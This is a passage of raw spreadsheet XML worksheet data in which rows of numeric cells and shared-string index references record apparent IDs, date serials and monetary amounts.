        <v>9437</v>
      </c>
      <c r="G4678" s="1">
        <v>44354</v>
      </c>
      <c r="H4678">
        <v>712000</v>
      </c>
      <c r="J4678" t="s">
        <v>13845</v>
      </c>
    </row>
    <row r="4679" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4679">
        <v>25386</v>
      </c>
      <c r="B4679">
        <v>1845</v>
      </c>
      <c r="C4679" t="s">
        <v>6583</v>
      </c>
      <c r="D4679" t="s">
        <v>13842</v>
      </c>
      <c r="E4679">
        <v>16</v>
      </c>
      <c r="F4679" t="s">
        <v>13846</v>
      </c>
      <c r="G4679" s="1">
        <v>44354</v>
      </c>
      <c r="H4679">
        <v>264000</v>
      </c>
      <c r="J4679" t="s">
        <v>13847</v>
      </c>
    </row>
    <row r="4680" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4680">
        <v>25387</v>
      </c>
      <c r="B4680">
        <v>1845</v>
      </c>
      <c r="C4680" t="s">
        <v>6583</v>
      </c>
      <c r="D4680" t="s">
        <v>13842</v>
      </c>
      <c r="E4680">
        <v>16</v>
      </c>
      <c r="F4680" t="s">
        <v>2236</v>
      </c>
      <c r="G4680" s="1">
        <v>44354</v>
      </c>
      <c r="H4680">
        <v>125000</v>
      </c>
      <c r="J4680" t="s">
        <v>13848</v>
      </c>
    </row>
    <row r="4681" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4681">
        <v>25388</v>
      </c>
      <c r="B4681">
        <v>1845</v>
      </c>
      <c r="C4681" t="s">
        <v>6583</v>
      </c>
      <c r="D4681" t="s">
        <v>13842</v>
      </c>
      <c r="E4681">
        <v>16</v>
      </c>
      <c r="F4681" t="s">
        <v>12040</v>
      </c>
      <c r="G4681" s="1">
        <v>44354</v>
      </c>
      <c r="H4681">
        <v>205000</v>
      </c>
      <c r="J4681" t="s">
        <v>13849</v>
      </c>
    </row>
    <row r="4682" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4682">
        <v>25389</v>
      </c>
      <c r="B4682">
        <v>1845</v>
      </c>
      <c r="C4682" t="s">
        <v>6583</v>
      </c>
      <c r="D4682" t="s">
        <v>13842</v>
      </c>
      <c r="E4682">
        <v>16</v>
      </c>
      <c r="F4682" t="s">
        <v>9497</v>
      </c>
      <c r="G4682" s="1">
        <v>44354</v>
      </c>
      <c r="H4682">
        <v>70000</v>
      </c>
      <c r="J4682" t="s">
        <v>11161</v>
      </c>
    </row>
    <row r="4683" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4683">
        <v>25390</v>
      </c>
      <c r="B4683">
        <v>1845</v>
      </c>
      <c r="C4683" t="s">
        <v>6583</v>
      </c>
      <c r="D4683" t="s">
        <v>13850</v>
      </c>
      <c r="E4683">
        <v>16</v>
      </c>
      <c r="F4683" t="s">
        <v>3499</v>
      </c>
      <c r="G4683" s="1">
        <v>44354</v>
      </c>
      <c r="H4683">
        <v>15</v>
      </c>
      <c r="J4683" t="s">
        <v>11161</v>
      </c>
    </row>
    <row r="4684" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4684">
        <v>25392</v>
      </c>
      <c r="B4684">
        <v>5193</v>
      </c>
      <c r="C4684" t="s">
        <v>16566</v>
      </c>
      <c r="D4684" t="s">
        <v>16567</v>
      </c>
      <c r="E4684">
        <v>24</v>
      </c>
      <c r="F4684" t="s">
        <v>9673</v>
      </c>
      <c r="G4684" s="1">
        <v>44343</v>
      </c>
      <c r="H4684" s="4">
        <v>50000</v>
      </c>
      <c r="I4684" t="s">
        <v>13601</v>
      </c>
    </row>
    <row r="4685" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4685">
        <v>25393</v>
      </c>
      <c r="B4685">
        <v>5193</v>
      </c>
      <c r="C4685" t="s">
        <v>16566</v>
      </c>
      <c r="D4685" t="s">
        <v>16567</v>
      </c>
      <c r="E4685">
        <v>24</v>
      </c>
      <c r="F4685" t="s">
        <v>9641</v>
      </c>
      <c r="G4685" s="1">
        <v>44343</v>
      </c>
      <c r="H4685" s="4">
        <v>10000</v>
      </c>
      <c r="I4685" t="s">
        <v>13601</v>
      </c>
    </row>
    <row r="4686" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4686">
        <v>25394</v>
      </c>
      <c r="B4686">
        <v>5193</v>
      </c>
      <c r="C4686" t="s">
        <v>16566</v>
      </c>
      <c r="D4686" t="s">
        <v>16567</v>
      </c>
      <c r="E4686">
        <v>24</v>
      </c>
      <c r="F4686" t="s">
        <v>13459</v>
      </c>
      <c r="G4686" s="1">
        <v>44343</v>
      </c>
      <c r="H4686" s="4">
        <v>50000</v>
      </c>
    </row>
    <row r="4687" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4687">
        <v>25395</v>
      </c>
      <c r="B4687">
        <v>5639</v>
      </c>
      <c r="C4687" t="s">
        <v>9058</v>
      </c>
      <c r="D4687" t="s">
        <v>13851</v>
      </c>
      <c r="E4687">
        <v>29</v>
      </c>
      <c r="F4687" t="s">
        <v>13707</v>
      </c>
      <c r="G4687" s="1">
        <v>44354</v>
      </c>
      <c r="H4687">
        <v>25</v>
      </c>
      <c r="I4687" t="s">
        <v>13852</v>
      </c>
    </row>
    <row r="4688" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4688">
        <v>25396</v>
      </c>
      <c r="B4688">
        <v>5639</v>
      </c>
      <c r="C4688" t="s">
        <v>9058</v>
      </c>
      <c r="D4688" t="s">
        <v>13851</v>
      </c>
      <c r="E4688">
        <v>29</v>
      </c>
      <c r="F4688" t="s">
        <v>3341</v>
      </c>
      <c r="G4688" s="1">
        <v>44354</v>
      </c>
      <c r="H4688">
        <v>30</v>
      </c>
      <c r="I4688" t="s">
        <v>13852</v>
      </c>
    </row>
    <row r="4689" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4689">
        <v>25397</v>
      </c>
      <c r="B4689">
        <v>5617</v>
      </c>
      <c r="C4689" t="s">
        <v>9064</v>
      </c>
      <c r="D4689" t="s">
        <v>13853</v>
      </c>
      <c r="E4689">
        <v>7</v>
      </c>
      <c r="F4689" t="s">
        <v>13854</v>
      </c>
      <c r="G4689" s="1">
        <v>44327</v>
      </c>
      <c r="H4689">
        <v>1000</v>
      </c>
      <c r="I4689" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4690" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4690">
        <v>25398</v>
      </c>
      <c r="B4690">
        <v>5617</v>
      </c>
      <c r="C4690" t="s">
        <v>9064</v>
      </c>
      <c r="D4690" t="s">
        <v>13853</v>
      </c>
      <c r="E4690">
        <v>7</v>
      </c>
      <c r="F4690" t="s">
        <v>8700</v>
      </c>
      <c r="G4690" s="1">
        <v>44327</v>
      </c>
      <c r="H4690">
        <v>500</v>
      </c>
      <c r="I4690" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4691" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4691">
        <v>25399</v>
      </c>
      <c r="B4691">
        <v>5613</v>
      </c>
      <c r="C4691" t="s">
        <v>9070</v>
      </c>
      <c r="D4691" t="s">
        <v>13855</v>
      </c>
      <c r="E4691">
        <v>4</v>
      </c>
      <c r="F4691" t="s">
        <v>7057</v>
      </c>
      <c r="G4691" s="1">
        <v>44313</v>
      </c>
      <c r="H4691">
        <v>30000</v>
      </c>
      <c r="J4691" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4692" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4692">
        <v>25405</v>
      </c>
      <c r="B4692">
        <v>2164</v>
      </c>
      <c r="C4692" t="s">
        <v>6598</v>
      </c>
      <c r="D4692" t="s">
        <v>13856</v>
      </c>
      <c r="E4692">
        <v>7</v>
      </c>
      <c r="F4692" t="s">
        <v>13857</v>
      </c>
      <c r="G4692" s="1">
        <v>44351</v>
      </c>
      <c r="H4692">
        <v>1000</v>
      </c>
      <c r="I4692" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4693" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4693">
        <v>25406</v>
      </c>
      <c r="B4693">
        <v>2164</v>
      </c>
      <c r="C4693" t="s">
        <v>6598</v>
      </c>
      <c r="D4693" t="s">
        <v>13856</v>
      </c>
      <c r="E4693">
        <v>7</v>
      </c>
      <c r="F4693" t="s">
        <v>13858</v>
      </c>
      <c r="G4693" s="1">
        <v>44351</v>
      </c>
      <c r="H4693">
        <v>500</v>
      </c>
      <c r="I4693" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4694" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4694">
        <v>25407</v>
      </c>
      <c r="B4694">
        <v>2164</v>
      </c>
      <c r="C4694" t="s">
        <v>6598</v>
      </c>
      <c r="D4694" t="s">
        <v>13856</v>
      </c>
      <c r="E4694">
        <v>7</v>
      </c>
      <c r="F4694" t="s">
        <v>13854</v>
      </c>
      <c r="G4694" s="1">
        <v>44351</v>
      </c>
      <c r="H4694">
        <v>300</v>
      </c>
      <c r="I4694" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4695" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4695">
        <v>25408</v>
      </c>
      <c r="B4695">
        <v>2164</v>
      </c>
      <c r="C4695" t="s">
        <v>6598</v>
      </c>
      <c r="D4695" t="s">
        <v>13856</v>
      </c>
      <c r="E4695">
        <v>7</v>
      </c>
      <c r="F4695" t="s">
        <v>13859</v>
      </c>
      <c r="G4695" s="1">
        <v>44351</v>
      </c>
      <c r="H4695">
        <v>500</v>
      </c>
      <c r="I4695" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4696" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4696">
        <v>25409</v>
      </c>
      <c r="B4696">
        <v>2164</v>
      </c>
      <c r="C4696" t="s">
        <v>6598</v>
      </c>
      <c r="D4696" t="s">
        <v>13856</v>
      </c>
      <c r="E4696">
        <v>7</v>
      </c>
      <c r="F4696" t="s">
        <v>13860</v>
      </c>
      <c r="G4696" s="1">
        <v>44351</v>
      </c>
      <c r="H4696">
        <v>300</v>
      </c>
      <c r="I4696" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4697" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4697">
        <v>25410</v>
      </c>
      <c r="B4697">
        <v>2164</v>
      </c>
      <c r="C4697" t="s">
        <v>6598</v>
      </c>
      <c r="D4697" t="s">
        <v>13856</v>
      </c>
      <c r="E4697">
        <v>7</v>
      </c>
      <c r="F4697" t="s">
        <v>13861</v>
      </c>
      <c r="G4697" s="1">
        <v>44351</v>
      </c>
      <c r="H4697">
        <v>500</v>
      </c>
      <c r="I4697" t="s">
        <v>9791</v>
      </c>
    </row>
    <row r="4698" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4698">
        <v>25413</v>
      </c>
      <c r="B4698">
        <v>5645</v>
      </c>
      <c r="C4698" t="s">
        <v>2951</v>
      </c>
      <c r="D4698" t="s">
        <v>13862</v>
      </c>
      <c r="E4698">
        <v>22</v>
      </c>
      <c r="F4698" t="s">
        <v>13863</v>
      </c>
      <c r="G4698" s="1">
        <v>44337</v>
      </c>
      <c r="H4698">
        <v>6000</v>
      </c>
      <c r="I4698" t="s">
        <v>9550</v>
      </c>
      <c r="J4698" t="s">
        <v>13864</v>
      </c>
    </row>
    <row r="4699" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4699">
        <v>25414</v>
      </c>
      <c r="B4699">
        <v>5645</v>
      </c>
      <c r="C4699" t="s">
        <v>2951</v>
      </c>
      <c r="D4699" t="s">
        <v>13862</v>
      </c>
      <c r="E4699">
        <v>22</v>
      </c>
      <c r="F4699" t="s">
        <v>13865</v>
      </c>
      <c r="G4699" s="1">
        <v>44337</v>
      </c>
      <c r="H4699">
        <v>5000</v>
      </c>
      <c r="I4699" t="s">
        <v>9485</v>
      </c>
      <c r="J4699" t="s">
        <v>13866</v>
      </c>
    </row>
    <row r="4700" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4700">
        <v>25415</v>
      </c>
      <c r="B4700">
        <v>5643</v>
      </c>
      <c r="C4700" t="s">
        <v>9084</v>
      </c>
      <c r="D4700" t="s">
        <v>13867</v>
      </c>
      <c r="E4700">
        <v>13</v>
      </c>
      <c r="F4700" t="s">
        <v>673</v>
      </c>
      <c r="G4700" s="1">
        <v>44354</v>
      </c>
      <c r="H4700">
        <v>3000</v>
      </c>
      <c r="I4700" t="s">
        <v>10442</v>
      </c>
      <c r="J4700" t="s">
        <v>13868</v>
      </c>
    </row>
    <row r="4701" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4701">
        <v>25416</v>
      </c>
      <c r="B4701">
        <v>5643</v>
      </c>
      <c r="C4701" t="s">
        <v>9084</v>
      </c>
      <c r="D4701" t="s">
        <v>13867</v>
      </c>
      <c r="E4701">
        <v>13</v>
      </c>
      <c r="F4701" t="s">
        <v>9441</v>
      </c>
      <c r="G4701" s="1">
        <v>44354</v>
      </c>
      <c r="H4701">
        <v>3000</v>
      </c>
      <c r="I4701" t="s">
        <v>10442</v>
      </c>
      <c r="J4701" t="s">
        <v>13868</v>
      </c>
    </row>
    <row r="4702" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4702">
        <v>25417</v>
      </c>
      <c r="B4702">
        <v>5643</v>
      </c>
      <c r="C4702" t="s">
        <v>9084</v>
      </c>
      <c r="D4702" t="s">
        <v>13867</v>
      </c>
      <c r="E4702">
        <v>13</v>
      </c>
      <c r="F4702" t="s">
        <v>10007</v>
      </c>
      <c r="G4702" s="1">
        <v>44354</v>
      </c>
      <c r="H4702">
        <v>969154</v>
      </c>
      <c r="I4702" t="s">
        <v>13869</v>
      </c>
      <c r="J4702" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="4703" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4703">
        <v>25418</v>
      </c>
      <c r="B4703">
        <v>161</v>
      </c>
      <c r="C4703" t="s">
        <v>16568</v>
      </c>
      <c r="D4703" t="s">
        <v>16569</v>
      </c>
      <c r="E4703">
        <v>11</v>
      </c>
      <c r="F4703" t="s">
        <v>609</v>
      </c>
      <c r="G4703" s="1">
        <v>44327</v>
      </c>
      <c r="H4703" s="4">
        <v>100000</v>
      </c>
      <c r="I4703" t="s">
        <v>10442</v>
      </c>
      <c r="J4703" t="s">
        <v>12810</v>
      </c>
    </row>
    <row r="4704" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4704">
        <v>25419</v>
      </c>
      <c r="B4704">
        <v>5220</v>
      </c>
      <c r="C4704" t="s">
        <v>8895</v>
      </c>
      <c r="D4704" t="s">
        <v>13870</v>
      </c>
      <c r="E4704">
        <v>16</v>
      </c>
      <c r="F4704" t="s">
        <v>8897</v>
      </c>
      <c r="G4704" s="1">
        <v>44369</v>
      </c>
      <c r="H4704">
        <v>240</v>
      </c>
      <c r="I4704" t="s">
        <v>13871</v>
      </c>
      <c r="J4704" t="s">
        <v>13872</v>
      </c>
    </row>
    <row r="4705" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4705">
        <v>25422</v>
      </c>
      <c r="B4705">
        <v>5628</v>
      </c>
      <c r="C4705" t="s">
        <v>9103</v>
      </c>
      <c r="D4705" t="s">
        <v>13873</v>
      </c>
      <c r="E4705">
        <v>6</v>
      </c>
      <c r="F4705" t="s">
        <v>6141</v>
      </c>
      <c r="G4705" s="1">
        <v>44321</v>
      </c>
      <c r="H4705">
        <v>30000</v>
      </c>
      <c r="I4705" t="s">
        <v>9852</v>
      </c>
      <c r="J4705" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4706" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4706">
        <v>25423</v>
      </c>
      <c r="B4706">
        <v>5628</v>
      </c>
      <c r="C4706" t="s">
        <v>9103</v>
      </c>
      <c r="D4706" t="s">
        <v>13873</v>
      </c>
      <c r="E4706">
        <v>6</v>
      </c>
      <c r="F4706" t="s">
        <v>8643</v>
      </c>
      <c r="G4706" s="1">
        <v>44321</v>
      </c>
      <c r="H4706">
        <v>20000</v>
      </c>
      <c r="I4706" t="s">
        <v>13874</v>
      </c>
      <c r="J4706" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4707" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4707">
        <v>25424</v>
      </c>
      <c r="B4707">
        <v>5628</v>
      </c>
      <c r="C4707" t="s">
        <v>9103</v>
      </c>
      <c r="D4707" t="s">
        <v>13873</v>
      </c>
      <c r="E4707">
        <v>6</v>
      </c>
      <c r="F4707" t="s">
        <v>13645</v>
      </c>
      <c r="G4707" s="1">
        <v>44321</v>
      </c>
      <c r="H4707">
        <v>20000</v>
      </c>
      <c r="I4707" t="s">
        <v>13875</v>
      </c>
      <c r="J4707" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4708" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4708">
        <v>25433</v>
      </c>
      <c r="B4708">
        <v>1663</v>
      </c>
      <c r="C4708" t="s">
        <v>16428</v>
      </c>
      <c r="D4708" t="s">
        <v>16429</v>
      </c>
      <c r="E4708">
        <v>31</v>
      </c>
      <c r="F4708" t="s">
        <v>3763</v>
      </c>
      <c r="G4708" s="1">
        <v>44371</v>
      </c>
      <c r="H4708" s="4">
        <v>266000</v>
      </c>
      <c r="I4708" t="s">
        <v>9536</v>
      </c>
      <c r="J4708" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4709" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4709">
        <v>25435</v>
      </c>
      <c r="B4709">
        <v>1689</v>
      </c>
      <c r="C4709" t="s">
        <v>4627</v>
      </c>
      <c r="D4709" t="s">
        <v>13780</v>
      </c>
      <c r="E4709">
        <v>5</v>
      </c>
      <c r="F4709" t="s">
        <v>9561</v>
      </c>
      <c r="G4709" s="1">
        <v>44336</v>
      </c>
      <c r="H4709">
        <v>6000</v>
      </c>
      <c r="I4709" t="s">
        <v>10518</v>
      </c>
      <c r="J4709" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4710" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4710">
        <v>25436</v>
      </c>
      <c r="B4710">
        <v>1689</v>
      </c>
      <c r="C4710" t="s">
        <v>4627</v>
      </c>
      <c r="D4710" t="s">
        <v>13780</v>
      </c>
      <c r="E4710">
        <v>5</v>
      </c>
      <c r="F4710" t="s">
        <v>9470</v>
      </c>
      <c r="G4710" s="1">
        <v>44336</v>
      </c>
      <c r="H4710">
        <v>12000</v>
      </c>
      <c r="I4710" t="s">
        <v>10518</v>
      </c>
      <c r="J4710" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4711" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4711">
        <v>25437</v>
      </c>
      <c r="B4711">
        <v>1689</v>
      </c>
      <c r="C4711" t="s">
        <v>4627</v>
      </c>
      <c r="D4711" t="s">
        <v>13780</v>
      </c>
      <c r="E4711">
        <v>5</v>
      </c>
      <c r="F4711" t="s">
        <v>13876</v>
      </c>
      <c r="G4711" s="1">
        <v>44336</v>
      </c>
      <c r="H4711">
        <v>12000</v>
      </c>
      <c r="I4711" t="s">
        <v>10518</v>
      </c>
      <c r="J4711" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4712" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4712">
        <v>25438</v>
      </c>
      <c r="B4712">
        <v>5627</v>
      </c>
      <c r="C4712" t="s">
        <v>9088</v>
      </c>
      <c r="D4712" t="s">
        <v>13877</v>
      </c>
      <c r="E4712">
        <v>13</v>
      </c>
      <c r="F4712" t="s">
        <v>13878</v>
      </c>
      <c r="G4712" s="1">
        <v>44358</v>
      </c>
      <c r="H4712">
        <v>180000</v>
      </c>
    </row>
    <row r="4713" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4713">
        <v>25442</v>
      </c>
      <c r="B4713">
        <v>332</v>
      </c>
      <c r="C4713" t="s">
        <v>1649</v>
      </c>
      <c r="D4713" t="s">
        <v>13879</v>
      </c>
      <c r="E4713">
        <v>17</v>
      </c>
      <c r="F4713" t="s">
        <v>1651</v>
      </c>
      <c r="G4713" s="1">
        <v>44337</v>
      </c>
      <c r="H4713">
        <v>3600000</v>
      </c>
      <c r="I4713" t="s">
        <v>13880</v>
      </c>
      <c r="J4713" t="s">
        <v>12096</v>
      </c>
    </row>
    <row r="4714" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4714">
        <v>25443</v>
      </c>
      <c r="B4714">
        <v>1779</v>
      </c>
      <c r="C4714" t="s">
        <v>6606</v>
      </c>
      <c r="D4714" t="s">
        <v>13881</v>
      </c>
      <c r="E4714">
        <v>2</v>
      </c>
      <c r="F4714" t="s">
        <v>3814</v>
      </c>
      <c r="G4714" s="1">
        <v>44364</v>
      </c>
      <c r="H4714">
        <v>1440000</v>
      </c>
      <c r="J4714" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4715" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4715">
        <v>25444</v>
      </c>
      <c r="B4715">
        <v>1779</v>
      </c>
      <c r="C4715" t="s">
        <v>6606</v>
      </c>
      <c r="D4715" t="s">
        <v>13881</v>
      </c>
      <c r="E4715">
        <v>2</v>
      </c>
      <c r="F4715" t="s">
        <v>13882</v>
      </c>
      <c r="G4715" s="1">
        <v>44364</v>
      </c>
      <c r="H4715">
        <v>1560000</v>
      </c>
      <c r="J4715" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4716" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4716">
        <v>25445</v>
      </c>
      <c r="B4716">
        <v>1779</v>
      </c>
      <c r="C4716" t="s">
        <v>6606</v>
      </c>
      <c r="D4716" t="s">
        <v>13881</v>
      </c>
      <c r="E4716">
        <v>2</v>
      </c>
      <c r="F4716" t="s">
        <v>13883</v>
      </c>
      <c r="G4716" s="1">
        <v>44364</v>
      </c>
      <c r="H4716">
        <v>1560000</v>
      </c>
      <c r="J4716" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4717" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4717">
        <v>25446</v>
      </c>
      <c r="B4717">
        <v>1779</v>
      </c>
      <c r="C4717" t="s">
        <v>6606</v>
      </c>
      <c r="D4717" t="s">
        <v>13881</v>
      </c>
      <c r="E4717">
        <v>2</v>
      </c>
      <c r="F4717" t="s">
        <v>9527</v>
      </c>
      <c r="G4717" s="1">
        <v>44364</v>
      </c>
      <c r="H4717">
        <v>1200000</v>
      </c>
      <c r="J4717" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4718" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4718">
        <v>25447</v>
      </c>
      <c r="B4718">
        <v>1779</v>
      </c>
      <c r="C4718" t="s">
        <v>6606</v>
      </c>
      <c r="D4718" t="s">
        <v>13881</v>
      </c>
      <c r="E4718">
        <v>2</v>
      </c>
      <c r="F4718" t="s">
        <v>9640</v>
      </c>
      <c r="G4718" s="1">
        <v>44364</v>
      </c>
      <c r="H4718">
        <v>300000</v>
      </c>
      <c r="J4718" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4719" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4719">
        <v>25448</v>
      </c>
      <c r="B4719">
        <v>1157</v>
      </c>
      <c r="C4719" t="s">
        <v>4185</v>
      </c>
      <c r="D4719" t="s">
        <v>13884</v>
      </c>
      <c r="E4719">
        <v>10</v>
      </c>
      <c r="F4719" t="s">
        <v>364</v>
      </c>
      <c r="G4719" s="1">
        <v>44350</v>
      </c>
      <c r="H4719">
        <v>20000</v>
      </c>
      <c r="I4719" t="s">
        <v>13207</v>
      </c>
      <c r="J4719" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4720" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4720">
        <v>25449</v>
      </c>
      <c r="B4720">
        <v>1779</v>
      </c>
      <c r="C4720" t="s">
        <v>6606</v>
      </c>
      <c r="D4720" t="s">
        <v>13881</v>
      </c>
      <c r="E4720">
        <v>2</v>
      </c>
      <c r="F4720" t="s">
        <v>7901</v>
      </c>
      <c r="G4720" s="1">
        <v>44364</v>
      </c>
      <c r="H4720">
        <v>1320000</v>
      </c>
      <c r="J4720" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4721" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4721">
        <v>25450</v>
      </c>
      <c r="B4721">
        <v>1779</v>
      </c>
      <c r="C4721" t="s">
        <v>6606</v>
      </c>
      <c r="D4721" t="s">
        <v>13881</v>
      </c>
      <c r="E4721">
        <v>2</v>
      </c>
      <c r="F4721" t="s">
        <v>9642</v>
      </c>
      <c r="G4721" s="1">
        <v>44364</v>
      </c>
      <c r="H4721">
        <v>1320000</v>
      </c>
      <c r="J4721" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4722" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4722">
        <v>25451</v>
      </c>
      <c r="B4722">
        <v>1779</v>
      </c>
      <c r="C4722" t="s">
        <v>6606</v>
      </c>
      <c r="D4722" t="s">
        <v>13881</v>
      </c>
      <c r="E4722">
        <v>2</v>
      </c>
      <c r="F4722" t="s">
        <v>9472</v>
      </c>
      <c r="G4722" s="1">
        <v>44364</v>
      </c>
      <c r="H4722">
        <v>180000</v>
      </c>
      <c r="J4722" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4723" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4723">
        <v>25452</v>
      </c>
      <c r="B4723">
        <v>1779</v>
      </c>
      <c r="C4723" t="s">
        <v>6606</v>
      </c>
      <c r="D4723" t="s">
        <v>13881</v>
      </c>
      <c r="E4723">
        <v>2</v>
      </c>
      <c r="F4723" t="s">
        <v>9437</v>
      </c>
      <c r="G4723" s="1">
        <v>44364</v>
      </c>
      <c r="H4723">
        <v>60000</v>
      </c>
      <c r="J4723" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="4724" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4724">
        <v>25453</v>
      </c>
      <c r="B4724">
        <v>1779</v>
      </c>
      <c r="C4724" t="s">
        <v>6606</v>
      </c>
      <c r="D4724" t="s">
        <v>13881</v>
      </c>
      <c r="E4724">
        <v>2</v>
      </c>
      <c r="F4724" t="s">
        <v>1746</v>
      </c>
      <c r="G4724" s="1">
        <v>44364</v>
      </c>
      <c r="H4724">
        <v>60000</v>
      </c>
      <c r="J4724" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="4725" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4725">
        <v>25454</v>
      </c>
      <c r="B4725">
        <v>1779</v>
      </c>
      <c r="C4725" t="s">
        <v>6606</v>
      </c>
      <c r="D4725" t="s">
        <v>13881</v>
      </c>
      <c r="E4725">
        <v>2</v>
      </c>
      <c r="F4725" t="s">
        <v>4508</v>
      </c>
      <c r="G4725" s="1">
        <v>44364</v>
      </c>
      <c r="H4725">
        <v>60000</v>
      </c>
      <c r="J4725" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="4726" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4726">
        <v>25455</v>
      </c>
      <c r="B4726">
        <v>1779</v>
      </c>
      <c r="C4726" t="s">
        <v>6606</v>
      </c>
      <c r="D4726" t="s">
        <v>13881</v>
      </c>
      <c r="E4726">
        <v>2</v>
      </c>
      <c r="F4726" t="s">
        <v>13885</v>
      </c>
      <c r="G4726" s="1">
        <v>44364</v>
      </c>
      <c r="H4726">
        <v>60000</v>
      </c>
      <c r="J4726" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="4727" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4727">
        <v>25456</v>
      </c>
      <c r="B4727">
        <v>1779</v>
      </c>
      <c r="C4727" t="s">
        <v>6606</v>
      </c>
      <c r="D4727" t="s">
        <v>13881</v>
      </c>
      <c r="E4727">
        <v>2</v>
      </c>
      <c r="F4727" t="s">
        <v>12406</v>
      </c>
      <c r="G4727" s="1">
        <v>44364</v>
      </c>
      <c r="H4727">
        <v>800000</v>
      </c>
      <c r="I4727" t="s">
        <v>13886</v>
      </c>
      <c r="J4727" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="4728" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4728">
        <v>25459</v>
      </c>
      <c r="B4728">
        <v>1804</v>
      </c>
      <c r="C4728" t="s">
        <v>6611</v>
      </c>
      <c r="D4728" t="s">
        <v>13887</v>
      </c>
      <c r="E4728">
        <v>19</v>
      </c>
      <c r="F4728" t="s">
        <v>2236</v>
      </c>
      <c r="G4728" s="1">
        <v>44379</v>
      </c>
      <c r="H4728">
        <v>40000</v>
      </c>
      <c r="I4728" t="s">
        <v>13888</v>
      </c>
      <c r="J4728" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="4729" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4729">
        <v>25460</v>
      </c>
      <c r="B4729">
        <v>1804</v>
      </c>
      <c r="C4729" t="s">
        <v>6611</v>
      </c>
      <c r="D4729" t="s">
        <v>13887</v>
      </c>
      <c r="E4729">
        <v>19</v>
      </c>
      <c r="F4729" t="s">
        <v>4686</v>
      </c>
      <c r="G4729" s="1">
        <v>44379</v>
      </c>
      <c r="H4729">
        <v>10000</v>
      </c>
      <c r="I4729" t="s">
        <v>9746</v>
      </c>
    </row>
    <row r="4730" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4730">
        <v>25461</v>
      </c>
      <c r="B4730">
        <v>1804</v>
      </c>
      <c r="C4730" t="s">
        <v>6611</v>
      </c>
      <c r="D4730" t="s">
        <v>13887</v>
      </c>
